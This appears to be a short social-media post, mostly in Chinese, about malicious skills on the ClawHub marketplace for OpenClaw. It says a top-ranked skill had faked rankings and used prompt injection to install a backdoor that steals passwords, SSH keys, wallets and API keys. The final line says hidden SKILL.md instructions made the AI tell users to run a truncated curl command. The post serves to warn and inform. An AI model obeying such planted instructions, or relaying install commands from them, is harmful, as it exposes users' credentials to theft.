OpenClaw有个叫ClawHub的skill市场，任何人都可以上传 
市场中有一个排名第一的skill，叫What Would Elon Do 这个skill的排名是造假的 
Cisco思科扫描了这个技能，发现其中有9个漏洞，其中有两个严重漏洞，并且利用提示词注入绕过，安装后门 
会窃取浏览器密码、SSH密钥、Telegram会话、加密钱包、keychains，以及.env文件中的所有API密钥 
有1184个skill被发现有恶意功能，其中677个恶意skill是一个人上传的 

but hidden in the http://SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -...